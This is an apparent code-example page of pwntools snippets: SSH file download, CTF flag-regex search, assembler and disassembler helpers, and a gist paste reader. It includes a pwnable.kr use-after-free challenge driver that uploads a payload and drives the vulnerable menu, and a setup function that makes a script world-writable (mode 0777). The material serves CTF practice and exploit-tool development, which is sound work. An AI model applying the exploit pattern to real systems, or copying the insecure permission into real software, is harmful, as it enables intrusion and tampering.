コード例 #1
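    def _download_raw(self, remote, local):
        """Copy the remote file ``remote`` to the local path ``local``.

        The remote path is base64-encoded here and decoded by the remote
        shell, so the raw path never appears unescaped inside the command
        string.  The size is fetched first (``wc -c``) purely for the
        progress display.  SFTP is used when the connection supports it;
        otherwise the file is streamed through ``cat`` and written locally.

        Progress and completion messages are suppressed when
        ``self.silent`` is set.
        """
        self._initialize_sftp()
        total, _ = self.run_simple('wc -c "$(echo %s|base64 -d)"' %
                                   pwn.b64(remote))
        total = pwn.size(int(total.split()[0]))

        if not self.silent:
            pwn.log.waitfor('Downloading %s' % remote)

        def update(has, _total):
            # Progress callback.  The second argument (the total SFTP
            # reports) is ignored in favour of the size measured above.
            if not self.silent:
                pwn.log.status("%s/%s" % (pwn.size(has), total))

        if self._supports_sftp:
            self._sftp.get(remote, local, update)
        else:
            # Collect chunks in a list and join once at the end; repeated
            # ``dat += chunk`` is quadratic on large files.
            chunks = []
            received = 0
            s = self.run('cat "$(echo %s|base64 -d)"' % pwn.b64(remote),
                         silent=True)
            while s.connected():
                update(received, 0)
                chunk = s.recv()
                chunks.append(chunk)
                received += len(chunk)
            pwn.write(local, ''.join(chunks))
        if not self.silent:
            pwn.log.succeeded()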
コード例 #2
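def FlagFinder(cible, flag):  # {{{
    """Search the file ``cible`` for the regex ``flag`` and save the matches.

    Each match is reported with ``pwn.success``.  All matches are then
    written to ``flag.txt`` in one go, one per line, so that several
    matches are all kept rather than each overwriting the previous one.

    Args:
        cible: path of the file to search.
        flag: regular expression passed to ``re.findall``.  It is applied
            to ``str()`` of whatever ``pwn.read`` returns; if that is bytes
            on this Python version the ``b'...'`` repr is searched — TODO
            confirm.  The pattern is taken as-is, so a pathological regex
            can make the search very slow on large files.
    """
    regex = flag
    file = cible
    t = pwn.read(file)
    c = re.findall(regex, str(t))
    if not c:
        pwn.warn("Flag non trouvé")
    else:
        for a in c:
            pwn.success("Yeah !!!! flag found: {result}\n".format(result=a))
        pwn.warn("flag is now copied in flag.txt")
        # str() keeps group-tuples from a capturing regex writable as well.
        pwn.write("flag.txt", "\n".join(str(a) for a in c))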
コード例 #3
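def Exploit(fichier, pattern):
    """Search the file ``fichier`` for the regex ``pattern`` and save matches.

    Progress is logged with ``pwn.info``; each match is reported with
    ``pwn.success`` and all matches are written to ``flag.txt`` once, one
    per line, so multiple matches are all preserved.

    Args:
        fichier: path of the file to search.
        pattern: regular expression passed to ``re.findall``.  It is applied
            to ``str()`` of whatever ``pwn.read`` returns; if that is bytes
            on this Python version the ``b'...'`` repr is searched — TODO
            confirm.  The pattern is used as-is, so a pathological regex
            can make the search very slow on large inputs.
    """
    regex = pattern
    file = fichier
    pwn.info("Opening file: {fichier}\n".format(fichier=file))
    s = pwn.read(file)
    pwn.info("Searching for pattern: {flag}\n".format(flag=regex))
    c = re.findall(regex, str(s))
    if not c:
        pwn.warn("No flag for you my friend, check your regex")
    else:
        for a in c:
            pwn.success("Yeah !!!! flag found: {result}\n".format(result=a))
        pwn.warn("flag is now copied in flag.txt")
        # str() keeps group-tuples from a capturing regex writable as well.
        pwn.write("flag.txt", "\n".join(str(a) for a in c))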
コード例 #4
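def Online(url, pattern, timeout=None):
    """Fetch ``url`` and search the response body for the regex ``pattern``.

    Each match is reported with ``pwn.success`` and all matches are written
    to ``flag.txt`` once, one per line.  The HTTP status is not checked: an
    error page is searched like any other body — TODO confirm intended.

    Args:
        url: address to GET.
        pattern: regular expression passed to ``re.findall``.  It is applied
            to ``str(response.content)``; under Python 3 ``content`` is
            bytes and ``str()`` yields its ``b'...'`` repr — TODO confirm
            the target Python version.
        timeout: optional ``requests`` timeout in seconds.  The default
            ``None`` keeps the previous behaviour (wait indefinitely).
    """
    regex = pattern
    file = url
    pwn.info("Opening file: {fichier}\n".format(fichier=file))
    # Close the session on exit so pooled connections are released even if
    # the request raises.
    with requests.session() as r:
        s = r.get(file, timeout=timeout)
        s = s.content
    pwn.info("Search for pattern: {flag}\n".format(flag=regex))
    c = re.findall(regex, str(s))
    if not c:
        pwn.warn("No flag for you my friend, check your regex")
    else:
        for a in c:
            pwn.success("Yeah !!!! flag found: {result}\n".format(result=a))
        pwn.warn("flag is now copied in flag.txt")
        # str() keeps group-tuples from a capturing regex writable as well.
        pwn.write("flag.txt", "\n".join(str(a) for a in c))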
コード例 #5
ファイル: ssh.py プロジェクト: 7h3rAm/pwntools
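    def _download_raw(self, remote, local):
        """Download the remote file ``remote`` to the local path ``local``.

        The path is base64-encoded on this side and decoded by the remote
        shell, so it is never interpolated unescaped into the command.  The
        remote size (``wc -c``) is only used for progress output.  SFTP is
        used when available; otherwise the content is streamed via ``cat``.

        Status messages are suppressed when ``self.silent`` is set.
        """
        self._initialize_sftp()
        total, _ = self.run_simple('wc -c "$(echo %s|base64 -d)"' % pwn.b64(remote))
        total = pwn.size(int(total.split()[0]))

        if not self.silent:
            pwn.log.waitfor('Downloading %s' % remote)

        def update(has, _total):
            # Progress callback; SFTP's own total (second argument) is
            # ignored in favour of the size measured above.
            if not self.silent:
                pwn.log.status("%s/%s" % (pwn.size(has), total))

        if self._supports_sftp:
            self._sftp.get(remote, local, update)
        else:
            # Accumulate chunks and join once; ``dat += chunk`` in a loop
            # is quadratic for large files.
            chunks = []
            received = 0
            s = self.run('cat "$(echo %s|base64 -d)"' % pwn.b64(remote), silent = True)
            while s.connected():
                update(received, 0)
                chunk = s.recv()
                chunks.append(chunk)
                received += len(chunk)
            pwn.write(local, ''.join(chunks))
        if not self.silent:
            pwn.log.succeeded()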
コード例 #6
# ``payload``, ``payload_length``, ``exe`` and ``random_file`` are assumed to
# be defined earlier in the script, outside this excerpt — TODO confirm.
pwn.debug(pwn.hexdump(payload))

# GDB command script used only in the GDB run mode below.  The breakpoint
# addresses are hard-coded for one specific build of the target binary.
gdbscript = '''
# Before "delete m;"
break *0x00401082

# before "m->introduce();"
break *0x00400fe2

# before "new"
break *0x00401020
continue
'''

# Run-mode dispatch.  ``pwn.args.GDB``: local run under gdb with the script
# above; ``pwn.args.LOCAL``: plain local process; otherwise the payload is
# uploaded over SSH and the binary is started on the remote host.  In every
# mode the target receives the payload length and payload file path as argv.
if pwn.args.GDB:
    pwn.write('/tmp/payload', payload)
    p = pwn.gdb.debug([exe.path, str(payload_length), '/tmp/payload'],
                      gdbscript=gdbscript)
elif pwn.args.LOCAL:
    pwn.write('/tmp/payload', payload)
    p = pwn.process([exe.path, str(payload_length), '/tmp/payload'])
else:
    # Remote mode: ``random_file`` is the upload destination path on the host.
    io = pwn.ssh("uaf", "pwnable.kr", 2222, "guest")
    io.upload_data(payload, random_file)
    p = io.process(["./uaf", str(payload_length), random_file])

# Drive the target's text menu: wait for the prompt, send option 3, then
# wait for the prompt and send option 2 twice.
p.recvuntil('1. use\n2. after\n3. free\n')
p.sendline('3')
for x in range(0, 2):
    p.recvuntil('1. use\n2. after\n3. free\n')
    p.sendline('2')
コード例 #7
def setup():
    """Write ``script`` to ``filename`` and make it executable.

    ``filename`` and ``script`` are module-level names defined elsewhere in
    this file.  The mode applied is 0777 — read, write and execute for the
    owner, the group *and* everyone else — so the file is world-writable
    and any local user could alter the script before it is run.
    """
    write(filename, script)
    # 0o777 == stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO
    os.chmod(filename, 0o777)
コード例 #8
ファイル: pbpeek.py プロジェクト: yudevan/pwntools
        req = requests.get('https://api.github.com/gists/' + identifier)
    except Exception as e:
        print('Unable to download from Github.')
        print(str(e))
        sys.exit(1)

    if req.status_code != 200:
        print('Unable to download from github, debug information follows')
        print(req.text)
        sys.exit(1)

    try:
        data = b64d(json.loads(req.text)['files']['data']['content'])
    except Exception as e:
        print('Unpacking data from Github failed.')
        print(str(e))
        sys.exit(1)

    cipher = Encryption(password)
    decrypted = cipher.decrypt(data)

    try:
        if filename is None:
            sys.stdout.write(decrypted)
        else:
            write(filename, decrypted)
    except Exception as e:
        print("Unable to write data to file '%s'" % filename)
        print(str(e))
        sys.exit(1)
コード例 #9
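def _asm(target_arch, target_os, code_blocks, emit_asm=0, keep_tmp=False):
    """Assemble ``code_blocks`` for ``target_arch``/``target_os`` into raw bytes.

    Pipeline (every intermediate file lives in a private temporary directory):

    1. build a source text: an optional ``#include`` for the target OS, a
       random ``magic`` marker line, architecture directives, then the
       caller's ``code_blocks``;
    2. run ``cpp`` over it and keep only what follows the marker, discarding
       the preprocessor's own output (line markers, expanded includes);
    3. assemble with ``nasm`` (i386/amd64) or the bundled GNU ``as``;
    4. for non-x86 targets, refuse objects that still contain relocations and
       extract the ``.shellcode`` section with ``objcopy``.

    Args:
        target_arch: architecture name.  ``'i386'``, ``'amd64'``, ``'arm'``,
            ``'thumb'``, ``'mips'`` and ``'mipsel'`` get specific directives;
            any other name is passed through to the bundled ``<arch>-as``.
        target_os: ``'linux'``, ``'freebsd'`` or ``None``; selects the
            include directory added to the ``cpp`` search path.
        code_blocks: list of assembly source strings, joined with newlines.
        emit_asm: ``0`` returns assembled bytes; ``1`` returns the
            preprocessed assembly with an "assemble with" header; ``2``
            returns the unpreprocessed source with the full command sequence
            as a comment.  Both non-zero modes return before assembling.
        keep_tmp: when true the temporary directory is left in place (for
            debugging the toolchain invocation).

    Returns:
        The raw machine code, or assembly source text for ``emit_asm``.

    Raises:
        Exception: no architecture given, bundled assembler missing, the
            ``cpp`` output could not be split on the marker, or relocations
            remain in the assembled object.
    """
    # Not used in this function; kept in case importing it has side effects
    # on the ``pwn`` package — TODO confirm before removing.
    import pwn.internal.shellcode_helper as H
    import os.path, tempfile, subprocess, string, shutil

    if target_arch is None:
        raise Exception('You need to set the architecture with context')

    # mkdtemp creates the directory with mode 0700, so the intermediate
    # files cannot be read or swapped by other local users.
    tmpdir = tempfile.mkdtemp(prefix='pwn-asm-')

    def path(s):
        return os.path.join(tmpdir, s)

    try:
        # Marker line used to cut cpp's output; 32 random letters so that a
        # code block is very unlikely to contain the same line.
        magic = pwn.randoms(32, only=string.ascii_lowercase)

        code = []

        # Every tool below is invoked as an argv list (no shell), assuming
        # ``_run`` hands the list straight to subprocess — TODO confirm.
        cpp = ['cpp', '-nostdinc', '-undef', '-w']
        if pwn.DEBUG:
            cpp += ['-D', 'DEBUG']

        if target_os is not None:
            include = os.path.join(pwn.installpath, 'pwn', 'include',
                                   target_os)
            cpp += ['-I', include]

        if target_os == 'linux':
            # Per-architecture header (dietlibc-style) only if it is shipped.
            if os.path.isfile(os.path.join(include, target_arch + '.h')):
                cpp += ['-I', os.path.join(include, 'diet')]
                code += ['#include <%s.h>' % target_arch]
        elif target_os == 'freebsd':
            code += ['#include <common.h>']

        code += [magic]
        # GNU as targets need an explicit section; nasm output is flat.
        if target_arch not in ['i386', 'amd64']:
            code += ['.section .shellcode,"ax"']

        asm_extra = []
        if target_arch == 'arm':
            code += ['.arm']
        elif target_arch == 'thumb':
            # Thumb is assembled with the ARM toolchain plus a .thumb directive.
            code += ['.thumb']
            target_arch = 'arm'
        elif target_arch == 'i386':
            code += ['bits 32']
        elif target_arch == 'amd64':
            code += ['bits 64']
        elif target_arch in ['mips', 'mipsel']:
            code += ['.set mips2']
            code += ['.set noreorder']
            # Endianness is selected by an assembler flag, not a directive.
            if target_arch == 'mips':
                asm_extra += ['--EB']
            else:
                asm_extra += ['--EL']
            target_arch = 'mips'

        code += code_blocks
        code = '\n'.join(code)

        if target_arch in ['i386', 'amd64']:
            assembler = ['nasm', '-Ox'] + asm_extra
            objcopy = ['objcopy']
        else:
            assembler = [
                os.path.join(pwn.installpath, 'binutils', target_arch + '-as')
            ] + asm_extra
            if not os.path.isfile(assembler[0]):
                raise Exception(
                    'Could not find the gnu assembler for this architecture: %s'
                    % target_arch)
            objcopy = [
                os.path.join(pwn.installpath, 'binutils', 'promisc-objcopy')
            ]
        objcopy += ['-j.shellcode', '-Obinary']

        if emit_asm == 2:
            output = []

            output += [
                "/*", "   Assemble with:",
                "   %s [input] -o [input].tmp1" % ' '.join(cpp),
                "   sed -e '0,/^%s$/d' [input].tmp1 > [input].tmp2" % magic,
                "   %s [input].tmp2 -o [input].tmp3" % ' '.join(assembler)
            ]
            if target_arch not in ['i386', 'amd64']:
                output += ["   %s [input].tmp3 [output]" % ' '.join(objcopy)]
            output += ["*/", "", code]
            return '\n'.join(output)

        pwn.write(path('step1'), code)
        _run(cpp + [path('step1'), path('step2')])
        code = pwn.read(path('step2'))

        # Everything before the marker is cpp's own preamble; drop it.
        _code = code.split('\n' + magic + '\n')

        if len(_code) != 2:
            raise Exception("The output from cpp was weird:\n%s" % code)

        code = _code[1]

        if emit_asm == 1:
            output = []

            if target_arch in ['i386', 'amd64']:
                output += [
                    ';; Assemble with:',
                    ';;   %s <input> -o <output>' % ' '.join(assembler)
                ]
            else:
                output += [
                    "/*",
                    "   Assemble with:",
                    '   %s <input> -o <input>.tmp' % ' '.join(assembler),
                    '   %s [input].tmp [output]' % ' '.join(objcopy),
                    '*/',
                ]
            output += ["", code]
            return '\n'.join(output)

        pwn.write(path('step3'), code)
        _run(assembler + ['-o', path('step4'), path('step3')])

        # nasm already produced a flat binary; nothing to extract.
        if target_arch in ['i386', 'amd64']:
            return pwn.read(path('step4'))

        # Sanity check for seeing if the output has relocations: position-
        # dependent code would be silently wrong once extracted.  readelf
        # prints a single line when there are none.  The split assumes a
        # str result (Python 2); under Python 3 this would be bytes — TODO
        # confirm the target version.
        relocs = subprocess.check_output(['readelf', '-r',
                                          path('step4')]).strip()
        if len(relocs.split('\n')) > 1:
            raise Exception('There were relocations in the shellcode:\n\n%s' %
                            relocs)

        _run(objcopy + [path('step4'), path('step5')])

        return pwn.read(path('step5'))
    finally:
        if not keep_tmp:
            # Best-effort cleanup: failure to remove the scratch directory
            # must not mask the real result or error.
            try:
                shutil.rmtree(tmpdir)
            except OSError:
                pass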
コード例 #10
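def _disasm(data, target_arch, keep_tmp=False):
    """Disassemble the raw machine code ``data`` for ``target_arch``.

    The bytes are wrapped into an ELF object with ``objcopy`` (input format
    ``binary``, ``.data`` renamed to an executable ``.text``) and then fed to
    ``objdump -d``; only the listing after the ``<.text>:`` label is
    returned.  All intermediate files live in a private temporary directory.

    Args:
        data: machine code to disassemble.
        target_arch: one of the architectures in the table below.
        keep_tmp: when true the temporary directory is left in place.

    Returns:
        The objdump listing for ``.text`` with surrounding newlines stripped.

    Raises:
        Exception: no architecture given, an architecture not in the table,
            or objdump output that does not contain exactly one ``<.text>:``
            label.
    """
    import os.path, tempfile, subprocess, shutil

    if target_arch is None:
        raise Exception('You need to set the architecture with context')

    # (BFD target name, BFD architecture or None for ``target_arch`` itself,
    # extra objcopy flags or None for the default ``-w -N *``).
    bfd_table = {
        'i386':    ('elf32-i386',        None,          None),
        'amd64':   ('elf64-x86-64',      'i386:x86-64', None),
        'arm':     ('elf32-littlearm',   None,          None),
        # Thumb: assemble as ARM but mark symbols so objdump decodes Thumb.
        'thumb':   ('elf32-littlearm',   'arm',         ['--prefix-symbol=$t.']),
        'mips':    ('elf32-bigmips',     None,          None),
        'mipsel':  ('elf32-littlemips',  None,          None),
        'alpha':   ('elf64-alpha',       None,          None),
        'cris':    ('elf32-cris',        None,          None),
        'ia64':    ('elf64-ia64-little', 'ia64-elf64',  None),
        'm68k':    ('elf32-m68k',        None,          None),
        'powerpc': ('elf32-powerpc',     None,          None),
        'vax':     ('elf32-vax',         None,          None),
    }

    # Fail with a clear message instead of an UnboundLocalError further down.
    if target_arch not in bfd_table:
        raise Exception('Unsupported architecture for disassembly: %s' %
                        target_arch)

    # mkdtemp creates the directory with mode 0700, so other local users
    # cannot read or replace the intermediate files.
    tmpdir = tempfile.mkdtemp(prefix='pwn-disasm-')

    def path(s):
        return os.path.join(tmpdir, s)

    try:
        bfdname, bfdarch, extra = bfd_table[target_arch]
        if bfdarch is None:
            bfdarch = target_arch
        if extra is None:
            extra = ['-w', '-N', '*']

        # x86 uses the system binutils; other targets use the bundled
        # multi-architecture ("promisc") builds.  Every tool is invoked as an
        # argv list, assuming ``_run`` passes it to subprocess unchanged —
        # TODO confirm.
        if target_arch in ['i386', 'amd64']:
            objcopy = ['objcopy']
            objdump = ['objdump', '-Mintel']
        else:
            objcopy = [
                os.path.join(pwn.installpath, 'binutils', 'promisc-objcopy')
            ]
            objdump = [
                os.path.join(pwn.installpath, 'binutils', 'promisc-objdump')
            ]

        objcopy += [
            '-I',
            'binary',
            '-O',
            bfdname,
            '-B',
            bfdarch,
            '--set-section-flags',
            '.data=code',
            '--rename-section',
            '.data=.text',
        ]

        objdump += ['-d']

        pwn.write(path('step1'), data)
        _run(objcopy + extra + [path('step1'), path('step2')])

        # The split assumes a str result (Python 2); under Python 3
        # check_output returns bytes — TODO confirm the target version.
        output0 = subprocess.check_output(objdump + [path('step2')])
        output1 = output0.split('<.text>:\n')
        if len(output1) != 2:
            raise Exception('Something went wrong with objdump:\n\n%s' %
                            output0)
        else:
            return output1[1].strip('\n')
    finally:
        if not keep_tmp:
            # Best-effort cleanup; must not mask the real result or error.
            try:
                shutil.rmtree(tmpdir)
            except OSError:
                pass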
コード例 #11
ファイル: asm.py プロジェクト: WizardsOfDos/pwntools
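def _asm(target_arch, target_os, code_blocks, emit_asm = 0, keep_tmp = False):
    """Assemble ``code_blocks`` for ``target_arch``/``target_os`` into raw bytes.

    Steps, all carried out inside a private temporary directory:

    1. compose the source: an optional OS ``#include``, a random ``magic``
       marker line, architecture directives, then the caller's blocks;
    2. preprocess with ``cpp`` and keep only the text after the marker so the
       preprocessor's own output (line markers, expanded includes) is dropped;
    3. assemble with ``nasm`` (i386/amd64) or the bundled GNU ``as``;
    4. for non-x86 targets, reject objects that still carry relocations and
       extract ``.shellcode`` with ``objcopy``.

    Args:
        target_arch: architecture name; ``'i386'``, ``'amd64'``, ``'arm'``,
            ``'thumb'``, ``'mips'`` and ``'mipsel'`` get directives, other
            names are passed through to the bundled ``<arch>-as``.
        target_os: ``'linux'``, ``'freebsd'`` or ``None``; picks the include
            directory added to the ``cpp`` search path.
        code_blocks: list of assembly source strings, joined by newlines.
        emit_asm: ``0`` returns assembled bytes; ``1`` the preprocessed
            assembly with an "assemble with" header; ``2`` the unpreprocessed
            source with the full command sequence as a comment.  Non-zero
            modes return before anything is assembled.
        keep_tmp: leave the temporary directory in place when true.

    Returns:
        Raw machine code, or assembly source text for ``emit_asm``.

    Raises:
        Exception: missing architecture, missing bundled assembler, ``cpp``
            output that cannot be split on the marker, or leftover
            relocations.
    """
    # Unused in this function; kept in case importing it has side effects on
    # the ``pwn`` package — TODO confirm before removing.
    import pwn.internal.shellcode_helper as H
    import os.path, tempfile, subprocess, string, shutil

    if target_arch is None:
        raise Exception('You need to set the architecture with context')

    # mkdtemp creates the directory with mode 0700, so the intermediate files
    # cannot be read or swapped by other local users.
    tmpdir = tempfile.mkdtemp(prefix = 'pwn-asm-')
    def path(s):
        return os.path.join(tmpdir, s)
    try:
        # Marker used to cut cpp's output; 32 random letters so a code block
        # is very unlikely to contain the same line.
        magic = pwn.randoms(32, only = string.ascii_lowercase)

        code = []

        # Tools are invoked as argv lists (no shell), assuming ``_run`` hands
        # the list straight to subprocess — TODO confirm.
        cpp = ['cpp', '-nostdinc', '-undef', '-w']
        if pwn.DEBUG:
            cpp += ['-D', 'DEBUG']

        if target_os is not None:
            include = os.path.join(pwn.installpath, 'pwn', 'include', target_os)
            cpp += ['-I', include]

        if target_os == 'linux':
            # Per-architecture header only when it is shipped.
            if os.path.isfile(os.path.join(include, target_arch + '.h')):
                cpp += ['-I', os.path.join(include, 'diet')]
                code += ['#include <%s.h>' % target_arch]
        elif target_os == 'freebsd':
            code += ['#include <common.h>']

        code += [magic]
        # GNU as targets need an explicit section; nasm output is flat.
        if target_arch not in ['i386', 'amd64']:
            code += ['.section .shellcode,"ax"']

        asm_extra = []
        if target_arch == 'arm':
            code += ['.arm']
        elif target_arch == 'thumb':
            # Thumb uses the ARM toolchain plus a .thumb directive.
            code += ['.thumb']
            target_arch = 'arm'
        elif target_arch == 'i386':
            code += ['bits 32']
        elif target_arch == 'amd64':
            code += ['bits 64']
        elif target_arch in ['mips', 'mipsel']:
            code += ['.set mips2']
            code += ['.set noreorder']
            # Endianness is an assembler flag rather than a directive.
            if target_arch == 'mips':
                asm_extra += ['--EB']
            else:
                asm_extra += ['--EL']
            target_arch = 'mips'

        code += code_blocks
        code = '\n'.join(code)

        if target_arch in ['i386', 'amd64']:
            assembler = ['nasm', '-Ox'] + asm_extra
            objcopy = ['objcopy']
        else:
            assembler = [os.path.join(pwn.installpath, 'binutils', target_arch + '-as')] + asm_extra
            if not os.path.isfile(assembler[0]):
                raise Exception('Could not find the gnu assembler for this architecture: %s' % target_arch)
            objcopy = [os.path.join(pwn.installpath, 'binutils', 'promisc-objcopy')]
        objcopy += ['-j.shellcode', '-Obinary']

        if emit_asm == 2:
            output = []

            output += [
                "/*",
                "   Assemble with:",
                "   %s [input] -o [input].tmp1"                       % ' '.join(cpp),
                "   sed -e '0,/^%s$/d' [input].tmp1 > [input].tmp2"   % magic,
                "   %s [input].tmp2 -o [input].tmp3"                  % ' '.join(assembler)
                ]
            if target_arch not in ['i386', 'amd64']:
                output += ["   %s [input].tmp3 [output]"              % ' '.join(objcopy)]
            output += ["*/", "", code]
            return '\n'.join(output)

        pwn.write(path('step1'), code)
        _run(cpp + [path('step1'), path('step2')])
        code = pwn.read(path('step2'))

        # Everything before the marker is cpp's own preamble; drop it.
        _code = code.split('\n' + magic + '\n')

        if len(_code) != 2:
            raise Exception("The output from cpp was weird:\n%s" % code)

        code = _code[1]

        if emit_asm == 1:
            output = []

            if target_arch in ['i386', 'amd64']:
                output += [
                    ';; Assemble with:',
                    ';;   %s <input> -o <output>'    % ' '.join(assembler)
                    ]
            else:
                output += [
                    "/*",
                    "   Assemble with:",
                    '   %s <input> -o <input>.tmp'   % ' '.join(assembler),
                    '   %s [input].tmp [output]'     % ' '.join(objcopy),
                    '*/',
                    ]
            output += ["", code]
            return '\n'.join(output)

        pwn.write(path('step3'), code)
        _run(assembler + ['-o', path('step4'), path('step3')])

        # nasm already emitted a flat binary; nothing to extract.
        if target_arch in ['i386', 'amd64']:
            return pwn.read(path('step4'))

        # Sanity check for seeing if the output has relocations: code that
        # still needs fix-ups would be silently wrong once extracted.  readelf
        # prints one line when there are none.  The split assumes a str result
        # (Python 2); under Python 3 this is bytes — TODO confirm.
        relocs = subprocess.check_output(['readelf', '-r', path('step4')]).strip()
        if len(relocs.split('\n')) > 1:
            raise Exception('There were relocations in the shellcode:\n\n%s' % relocs)

        _run(objcopy + [path('step4'), path('step5')])

        return pwn.read(path('step5'))
    finally:
        if not keep_tmp:
            # Best-effort cleanup; must not mask the real result or error.
            try:
                shutil.rmtree(tmpdir)
            except OSError:
                pass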
コード例 #12
ファイル: asm.py プロジェクト: WizardsOfDos/pwntools
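def _disasm(data, target_arch, keep_tmp = False):
    """Disassemble the raw machine code ``data`` for ``target_arch``.

    ``objcopy`` wraps the bytes into an ELF object (input format ``binary``,
    ``.data`` renamed to an executable ``.text``), ``objdump -d`` lists it,
    and only the text after the ``<.text>:`` label is returned.  All
    intermediate files live in a private temporary directory.

    Args:
        data: machine code to disassemble.
        target_arch: one of the architectures in the table below.
        keep_tmp: leave the temporary directory in place when true.

    Returns:
        The objdump listing for ``.text``, surrounding newlines stripped.

    Raises:
        Exception: missing architecture, an architecture not in the table, or
            objdump output without exactly one ``<.text>:`` label.
    """
    import os.path, tempfile, subprocess, shutil

    if target_arch is None:
        raise Exception('You need to set the architecture with context')

    # (BFD target, BFD architecture or None for ``target_arch`` itself,
    # extra objcopy flags or None for the default ``-w -N *``).
    bfd_table = {
        'i386':    ('elf32-i386',        None,          None),
        'amd64':   ('elf64-x86-64',      'i386:x86-64', None),
        'arm':     ('elf32-littlearm',   None,          None),
        # Thumb: ARM object, symbols prefixed so objdump decodes Thumb.
        'thumb':   ('elf32-littlearm',   'arm',         ['--prefix-symbol=$t.']),
        'mips':    ('elf32-bigmips',     None,          None),
        'mipsel':  ('elf32-littlemips',  None,          None),
        'alpha':   ('elf64-alpha',       None,          None),
        'cris':    ('elf32-cris',        None,          None),
        'ia64':    ('elf64-ia64-little', 'ia64-elf64',  None),
        'm68k':    ('elf32-m68k',        None,          None),
        'powerpc': ('elf32-powerpc',     None,          None),
        'vax':     ('elf32-vax',         None,          None),
    }

    # Clear error instead of an UnboundLocalError when building objcopy args.
    if target_arch not in bfd_table:
        raise Exception('Unsupported architecture for disassembly: %s' % target_arch)

    # mkdtemp creates the directory with mode 0700, so other local users
    # cannot read or replace the intermediate files.
    tmpdir = tempfile.mkdtemp(prefix = 'pwn-disasm-')
    def path(s):
        return os.path.join(tmpdir, s)
    try:
        bfdname, bfdarch, extra = bfd_table[target_arch]
        if bfdarch is None:
            bfdarch = target_arch
        if extra is None:
            extra = ['-w', '-N', '*']

        # x86 uses the system binutils; everything else the bundled
        # multi-architecture ("promisc") builds.  Tools are run as argv lists,
        # assuming ``_run`` passes them to subprocess unchanged — TODO confirm.
        if target_arch in ['i386', 'amd64']:
            objcopy = ['objcopy']
            objdump = ['objdump', '-Mintel']
        else:
            objcopy = [os.path.join(pwn.installpath, 'binutils', 'promisc-objcopy')]
            objdump = [os.path.join(pwn.installpath, 'binutils', 'promisc-objdump')]

        objcopy += ['-I', 'binary',
                    '-O', bfdname,
                    '-B', bfdarch,
                    '--set-section-flags', '.data=code',
                    '--rename-section', '.data=.text',
                    ]

        objdump += ['-d']

        pwn.write(path('step1'), data)
        _run(objcopy + extra + [path('step1'), path('step2')])

        # The split assumes a str result (Python 2); under Python 3
        # check_output returns bytes — TODO confirm the target version.
        output0 = subprocess.check_output(objdump + [path('step2')])
        output1 = output0.split('<.text>:\n')
        if len(output1) != 2:
            raise Exception('Something went wrong with objdump:\n\n%s' % output0)
        else:
            return output1[1].strip('\n')
    finally:
        if not keep_tmp:
            # Best-effort cleanup; must not mask the real result or error.
            try:
                shutil.rmtree(tmpdir)
            except OSError:
                pass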